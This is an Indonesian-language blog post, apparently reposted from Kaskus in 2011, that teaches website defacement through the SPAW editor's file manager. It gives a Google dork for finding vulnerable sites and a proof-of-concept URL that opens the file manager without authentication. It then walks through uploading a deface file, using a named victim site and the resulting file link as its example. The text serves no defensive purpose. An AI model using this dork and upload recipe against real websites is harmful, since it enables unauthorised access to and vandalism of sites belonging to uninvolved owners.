sumber :klik disini kaskus.us
DORK
inurl:spaw2/dialogs/ atau inurl:spaw2/uploads/files/
POC
spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2 &lang=es&charset=&scid=cf73b58bb51c52235494da75 2d9 8cac9
jika sudah menemukan targetnya contoh seperti ini :
http://olgabz.com/spaw2/dialogs/
lalu agan ganti spaw2/dialogs/
dengan
spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2 &lang=es&charset=&scid=cf73b58bb51c52235494da75 2d9 8cac9
jadinya kya gini http://olgabz.com/spaw2/dialogs/dial...a752d9%208cac9
nanti akan muncul SPAW File Manager,lihat gambar di bawah ini :
for penampakan
jangan lupa ganti type nya dari image ke File,dan agan tinggal upload file agan..
jika sudah trus di apain...??
trus agan lihat file kamu sudah masuk blom seperti gambar di bawah ini:
Spoiler for penampakan:
lalu bagaimana cara melihat hasil deface kita???
cara nya,agan klick file yg sudah agan upload,nanti akan ada tulisan download file di sebelah kanan,,dan agan klick,,maka hasil file deface agan akan keluar seperti ini..
ni hasilnya http://olgabz.com/spaw2/uploads/files/agarirs.jpg
udah dehh selesai deface nya,,gampang kan ???
Cara Deface menggunakan ASPX
2011-07-20T21:40:00+07:00
Febian